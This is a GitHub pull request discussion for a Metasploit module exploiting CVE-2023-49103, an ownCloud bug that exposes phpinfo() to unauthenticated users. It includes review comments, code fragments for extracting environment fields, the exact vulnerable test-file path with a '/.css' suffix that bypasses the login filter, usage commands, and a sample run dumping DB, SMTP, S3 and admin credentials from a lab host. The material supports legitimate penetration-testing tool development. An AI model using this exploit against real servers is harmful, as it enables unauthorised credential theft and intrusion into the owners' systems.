ownCloud phpinfo reader (CVE-2023-49103) #18591
Conversation
h00die
changed the title
|
CC @cfreal |
|
|
||
| ### ENDFILE | ||
|
|
||
| The file path to add to the end of hte URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`, |
There was a problem hiding this comment.
| The file path to add to the end of hte URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`, | |
| The file path to add to the end of the URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`, |
| 'Christian Fischer' # additional PoC work and research | ||
| ], | ||
| 'References' => [ | ||
| [ 'URL', 'https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/'], |
There was a problem hiding this comment.
| [ 'URL', 'https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/'], | |
| [ 'URL', 'https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/'], | |
| [ 'URL', 'https://www.ambionics.io/blog/owncloud-cve-2023-49103-cve-2023-49105'], |
| if res.body =~ /#{field_regex('HOSTNAME')}/ | ||
| print_good("Hostname: #{::Regexp.last_match(1)}") | ||
| end | ||
| if res.body =~ /#{field_regex('HOME')}/ | ||
| print_good("Home: #{::Regexp.last_match(1)}") | ||
| end | ||
| if res.body =~ /#{field_regex('APACHE_DOCUMENT_ROOT')}/ | ||
| print_good("Server Root: #{::Regexp.last_match(1)}") | ||
| end | ||
| if res.body =~ /#{field_regex('PWD')}/ | ||
| print_good("PWD: #{::Regexp.last_match(1)}") | ||
| end |
There was a problem hiding this comment.
I think it would be nice to have this factored into a loop, with key/values.
There was a problem hiding this comment.
I originally had it coded like that, but then trying to print the values out with nice labels, and post process groups together made it a little more unruly. Decided this was, while repetitive and long winded feeling, was better for organizing
There was a problem hiding this comment.
I was just in the middle of refactoring / making the change @jvoisin had suggested.
I was also experimenting with using an xpath instead of regex here. I know we usually prefer extracting data from response bodies using xpath for efficiency, especially when they're large, as is the case here - still testing.
@h00die I'll post a review either later today or early tomorrow.
There was a problem hiding this comment.
Thanks for the great module @h00die. Hope you don't mind the commit I pushed up. I was originally trying to swap out the method field_regex for the following:
def field_xpath(field)
"//tr[td[text() = '#{field} ']]/td[@class='v']/text()"
end
As I've always been under the impression that matching response bodies with xpath is supposed to be more efficient. After some benchmarking with couple thousands of module runs, I found that was not the case - possibly because I wasn't using a full xpath.
With field_regex the module took about 0.05 seconds to run on average.
with field_xpath the module took about 0.25 seconds to run on average.
The response body was so large the full xpaths were quite long and specific I didn't think it made sense to use them.
Anyways, the module was running perfectly before my commit and gives the same output after it's been applied:
msf6 > use auxiliary/gather/owncloud_phpinfo_reader
[*] Using auxiliary/gather/owncloud_phpinfo_reader
msf6 auxiliary(gather/owncloud_phpinfo_reader) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 auxiliary(gather/owncloud_phpinfo_reader) > run
[*] Running module against 127.0.0.1
[+] Found phpinfo page at: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
[+] Loot stored to: /Users/jheysel/.msf4/loot/20231204202617_default_127.0.0.1_owncloud.phpinfo_634937.txt
[+] License Key: 1122333
[+] Hostname: cd1977074298
[+] Home: /root
[+] Server Root: /var/www/owncloud
[+] PWD: /var/www/owncloud
[+] SMTP Username: smtp_username
[+] SMTP Password: smtp_password
[+] ownCloud Username: admin_username
[+] ownCloud Password: admin_password
[+] ownCloud Server Port: 8080
[+] DB Host: mariadb:3306
[+] DB Username: owncloud
[+] DB Password: owncloud
[+] DB Name: owncloud
[+] DB Type: mysql
[+] Redis Host: redis
[+] Redis Port: 6379
[+] ObjectStore Endpoint: https://s3.us-east-1.amazonaws.com
[+] ObjectStore Region: us-east-1
[+] ObjectStore Secret: secret123456
[+] ObjectStore Key: owncloud123456
[+] ObjectStore Bucket: owncloud
[+] Credentials
===========
Type Host Username Password Notes
---- ---- -------- -------- -----
S3 Object Store us-east-1 Key: owncloud123456 Secret: secret123456 Endpoint: https://s3.us-east-1.amazonaws.com, Bucket: owncloud
SMTP 127.0.0.1:25 smtp_username smtp_password
mysql 127.0.0.1:8080 owncloud owncloud
ownCloud 127.0.0.1:8080 admin_username admin_password
[*] Auxiliary module execution completed
documentation/modules/auxiliary/gather/owncloud_phpinfo_reader.md
Outdated
Show resolved
Hide resolved
|
I'm good with it! I was trying to leverage speed of completeness since this is in the headlines. Glad it's working! Ship it 🚢 |
Release NotesThis PR adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP and S3 credentials |
Docker containers of ownCloud compiled after February 2023, which have version 0.2.0 before 0.2.1 or 0.3.0 before 0.3.1 of the app
graphinstalledcontain a test file which prints
phpinfo()to an unauthenticated user. A post file name must be appended to the URL to bypass the login filter.Docker may export sensitive environment variables including ownCloud, DB, redis, SMTP, and S3 credentials, as well as other host information.
use auxiliary/gather/owncloud_phpinfo_readerset rhost [ip]run